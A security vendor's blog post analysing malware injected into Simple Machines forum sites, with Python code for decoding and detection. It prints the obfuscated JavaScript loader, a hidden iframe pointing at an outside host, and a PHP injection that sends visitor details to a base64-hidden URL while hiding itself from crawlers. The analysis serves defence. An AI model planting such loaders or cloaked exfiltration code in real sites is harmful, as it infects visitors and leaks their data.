• Simple Machines Malware

    Simple Machines is forum software used by thousands of website owners around the world to add online communities to their websites. Unfortunately, that popularity also makes it an attractive target: an attacker who compromises a Simple Machines installation can inject malware into a legitimate, trusted website and, through it, infect every visitor.

    This post details a fast-growing new strain of malware that targets websites running Simple Machines. At the time of posting, close to 30,000 websites have been infected. We detail the attack below.

    The malware
    The malware is injected into the site's pages as a script element. Before doing anything else, the script runs a few checks that only pass in a real browser: it subtracts two Date objects, adds a property to Object.prototype and reads it back, and creates a text node and reads its nodeValue. Only if those checks succeed does it decode the long numeric string (each 'a'-separated value is multiplied by two and treated as a character code) and hand the result to eval. In an analysis tool that does not implement these behaviours faithfully, the variables used by the decoder are never set and nothing is decoded.

    Interestingly, the decoded script itself creates a hidden 10x10 pixel iframe that loads additional malware from an external website, m-e.crossfitharlem.net. The same hidden iframe is also present as plain HTML at the end of the sample below, so the visitor's browser fetches the external content even when the script does not run. (The URL is defanged in the sample as hxxp.)

    Malware sample (JavaScript):

    <script>
    b=new function(){return 2;};
    try{app[1][2]}catch(q){ss="";}
    try{gberbger-2;}catch(q){s=String;}
    ddd=new Date();
    d2=new Date(ddd.valueOf()-2);
    Object.prototype.asd='e';
    if('e'==={}.asd)a=document['createTextNode']('321');
    if(a.nodeValue==321)h=(ddd-d2)*-1;
    n='4.5a4.5a52.5a51a16a20a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a57.5a58a24.5a19.5a16a59.5a52.5a50a58a52a30.5a19.5a24.5a24a19.5a16a52a50.5a52.5a51.5a52a58a30.5a19.5a24.5a24a19.5a16a57.5a58a60.5a54a50.5a30.5a19.5a59a52.5a57.5a52.5a49a52.5a54a52.5a58a60.5a29a52a52.5a50a50a50.5a55a29.5a56a55.5a57.5a52.5a58a52.5a55.5a55a29a48.5a49a57.5a55.5a54a58.5a58a50.5a29.5a54a50.5a51a58a29a24a29.5a58a55.5a56a29a24a29.5a19.5a31a30a23.5a52.5a51a57a48.5a54.5a50.5a31a17a20.5a29.5a4.5a4.5a62.5a4.5a4.5a51a58.5a55a49.5a58a52.5a55.5a55a16a52.5a51a57a48.5a54.5a50.5a57a20a20.5a61.5a4.5a4.5a4.5a59a48.5a57a16a51a16a30.5a16a50a55.5a49.5a58.5a54.5a50.5a55a58a23a49.5a57a50.5a48.5a58a50.5a34.5a54a50.5a54.5a50.5a55a58a20a19.5a52.5a51a57a48.5a54.5a50.5a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a57.5a57a49.5a19.5a22a19.5a52a58a58a56a29a23.5a23.5a54.5a22.5a50.5a23a49.5a57a55.5a57.5a57.5a51a52.5a58a52a48.5a57a54a50.5a54.5a23a55a50.5a58a23.5a61a23.5a57.5a58a24.5a19.5a20.5a29.5a51a23a57.5a58a60.5a54a50.5a23a59a52.5a57.5a52.5a49a52.5a54a52.5a58a60.5a30.5a19.5a52a52.5a50a50a50.5a55a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a56a55.5a57.5a52.5a58a52.5a55.5a55a30.5a19.5a48.5a49a57.5a55.5a54a58.5a58a50.5a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a54a50.5a51a58a30.5a19.5a24a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a58a55.5a56a30.5a19.5a24a19.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a59.5a52.5a50a58a52a19.5a22a19.5a24.5a24a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a52a50.5a52.5a51.5a52a58a19.5a22a19.5a24.5a24a19.5a20.5a29.5a4.5a4.5a4.5a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a54.5a50.5a20a19.5a49a55.5a50a60.5a19.5a20.5a45.5a24a46.5a23a48.5a56a56a50.5a55a50a33.5a52a52.5a54a50a20a51a20.5a29.5a4.5a4.5a62.5';
    n=n['split']('a');
    for(i=0;i!=n.length;i++)if(!+b)ss+=s.fromCharCode(-h*eval("n"+"[i]"));
    if(a.nodeValue==321)eval(ss);
    </script>
    <iframe style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;" src="hxxp://m-e.crossfitharlem.net/z/st1" height="10" width="10"></iframe></body></html>
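
    The decoding step, replayed in Python as an added example (this is not code from the original post or from the malware): it mirrors the sample's arithmetic on two fragments copied from the n string above, pulls URLs out of the decoded text, and flags hidden iframes of the kind appended to the sample. Everything other than the two fragments (the helper names, the SAMPLE_HTML page and the example.com iframe in it) is constructed for this illustration.

```python
import re

# Two fragments of the sample's n='...' literal. They are the pieces that
# decode to the iframe creation and its src attribute. (The page's copy of
# the full literal is line-wrapped, so the whole string is not used here.)
FRAGMENT_CREATE = (
    "59a48.5a57a16a51a16a30.5a16a50a55.5a49.5a58.5a54.5a50.5a55a58a23a49.5"
    "a57a50.5a48.5a58a50.5a34.5a54a50.5a54.5a50.5a55a58a20a19.5a52.5a51a57"
    "a48.5a54.5a50.5a19.5a20.5a29.5"
)
FRAGMENT_SRC = (
    "51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a57.5a57"
    "a49.5a19.5a22a19.5a52a58a58a56a29a23.5a23.5a54.5a22.5a50.5a23a49.5a57"
    "a55.5a57.5a57.5a51a52.5a58a52a48.5a57a54a50.5a54.5a23a55a50.5a58a23.5"
    "a61a23.5a57.5a58a24.5a19.5a20.5a29.5"
)

# Constructed page for the demonstration: one injected script carrying a
# fragment, the sample's hidden iframe (defanged as on the page) and a
# normal-sized benign iframe that must not be flagged.
SAMPLE_HTML = (
    "<p>forum index</p>"
    "<script>n='" + FRAGMENT_SRC + "';n=n['split']('a');</script>"
    '<iframe style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;" '
    'src="hxxp://m-e.crossfitharlem.net/z/st1" height="10" width="10"></iframe>'
    '<iframe src="https://example.com/embed" width="560" height="315"></iframe>'
)


def multiplier(ms_delta: int = 2) -> int:
    """The sample sets d2 two milliseconds before ddd and computes
    h = (ddd - d2) * -1, so h is -2 and each value is scaled by -h = 2."""
    h = ms_delta * -1
    return -h


def decode_payload(n: str, scale: int = multiplier()) -> str:
    """Replay the decode loop without eval: split on 'a', scale, chr()."""
    return "".join(chr(int(scale * float(v))) for v in n.split("a"))


N_LITERAL_RE = re.compile(r"n='([0-9.a]+)'")


def decode_script(page: str) -> str:
    """Locate the n='...' literal in an injected page and decode it."""
    m = N_LITERAL_RE.search(page)
    if not m:
        raise ValueError("no n='...' literal found")
    return decode_payload(m.group(1))


URL_RE = re.compile(r"https?://[\w.-]+(?:/[\w./-]*)?")


def extract_urls(text: str) -> list[str]:
    """Every http(s) URL in the decoded JavaScript."""
    return URL_RE.findall(text)


def defang(url: str) -> str:
    """Neutralise a URL for a report: http -> hxxp and '.' -> '[.]'."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*["']([^"']*)["']""")


def _px(value):
    """Numeric part of a width/height attribute; huge when absent."""
    digits = re.sub(r"\D", "", value or "")
    return int(digits) if digits else 10**6


def find_hidden_iframes(html: str) -> list[str]:
    """src of each iframe that is hidden via CSS or is 10x10 px or smaller,
    the shape of the iframe appended to the sample."""
    hits = []
    for attrs in IFRAME_RE.findall(html):
        a = {k.lower(): v for k, v in ATTR_RE.findall(attrs)}
        style = a.get("style", "").replace(" ", "").lower()
        tiny = _px(a.get("width")) <= 10 and _px(a.get("height")) <= 10
        if "visibility:hidden" in style or "display:none" in style or tiny:
            hits.append(a.get("src", ""))
    return hits


if __name__ == "__main__":
    decoded = decode_script(SAMPLE_HTML)
    print(decoded)
    print([defang(u) for u in extract_urls(decoded)])
    print(find_hidden_iframes(SAMPLE_HTML))
```

    Because the decoder is a straight reimplementation rather than a call to eval, it can be run on a captured page offline; the URLs it recovers are what an analyst should block or investigate, and find_hidden_iframes() catches the plain-HTML copy of the iframe even when the script is absent or damaged.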
    

    What does the malware do?
    PHP code like the sample below has been found injected into the compromised websites. It runs in two phases:

    1. If the visitor's user agent contains none of the strings in the filter (google, yahoo, baidu, msn, bing, bot, and also opera, chrome and safari), the code sends the visitor's IP address, user agent, host name and request path to conqstat.com. The base64 literal in the sample decodes to the stat.php URL on that host.
    2. The JavaScript shown above is returned in the reply and inserted into the page served to that visitor.

    The filter keeps the injection away from search-engine crawlers, which would otherwise flag the site, and also from Opera, Chrome and Safari users, so the infection is only visible to visitors using other browsers.

    Malware sample (PHP):

    <?php
    if (!isset($sRetry))
    {
        global $sRetry;
        $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
                $stCurlLink = base64_decode( 'aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                $stCurlHandle = curl_init( $stCurlLink );
    [snipped...]
    ?>
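
    The user-agent gate and the hidden conqstat.com URL, replayed in Python as an added example (not code from the page or from the malware): would_be_served() reproduces the strstr() filter so you can see which visitors receive the payload, and hidden_urls() decodes every base64 literal passed to base64_decode() in a PHP file and reports the ones that turn into URLs. The user-agent strings and the SAMPLE_PHP snippet are constructed for the test; the base64 literal is the one from the sample above.

```python
import base64
import re

# Substrings the PHP gate tests with strstr(); a hit on any of them means
# the visitor is treated as a crawler (or an unwanted browser) and receives
# a clean page.
SKIP_TOKENS = ("google", "yahoo", "baidu", "msn", "opera", "chrome",
               "bing", "safari", "bot")


def would_be_served(user_agent: str) -> bool:
    """Reproduce the gate: the payload is fetched only when the lower-cased
    user agent contains none of SKIP_TOKENS."""
    ua = user_agent.lower()
    return not any(tok in ua for tok in SKIP_TOKENS)


# Constructed user agents for the checks below (not from the page).
UA_FIREFOX = "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"
UA_IE8 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
UA_CHROME = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 "
             "Chrome/17.0.963.56 Safari/535.11")
UA_GOOGLEBOT = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# base64_decode('...') calls with a literal of at least 16 characters.
B64_CALL_RE = re.compile(
    r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]{16,})['"]\s*\)""")


def hidden_urls(php_source: str) -> list[str]:
    """Decode each base64 literal handed to base64_decode() and return those
    that decode to an http(s) URL, a cheap indicator for this dropper."""
    found = []
    for literal in B64_CALL_RE.findall(php_source):
        padded = literal + "=" * (-len(literal) % 4)
        try:
            text = base64.b64decode(padded).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not text: skip it
        if text.startswith(("http://", "https://")):
            found.append(text)
    return found


# Constructed PHP snippet carrying the literal from the sample above.
SAMPLE_PHP = r"""<?php
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
$stCurlLink = base64_decode( 'aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent);
?>"""


if __name__ == "__main__":
    for ua in (UA_FIREFOX, UA_IE8, UA_CHROME, UA_GOOGLEBOT):
        print(would_be_served(ua), ua)
    print(hidden_urls(SAMPLE_PHP))
```

    The gate means Googlebot, Chrome, Safari and Opera never see the injection. When checking a site by hand, fetch it with a Firefox or Internet Explorer user agent, or better, scan the PHP files on disk for base64_decode() calls that hide URLs and for curl requests to hosts you do not recognise.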
    

    How do I protect my site?
    Malicious hackers constantly change their tactics to evade detection and keep infecting unsuspecting users, so it is imperative to stay current on how infections are spreading to legitimate websites. Note that the PHP gate shown above hides the injection from search-engine crawlers and from Opera, Chrome and Safari visitors: a site owner who checks the site in one of those browsers will see a clean page. Inspect the files on the server (base64_decode() calls and curl requests to unfamiliar hosts are the tell-tale signs here) rather than relying on what your own browser renders.

    StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

    Till next time…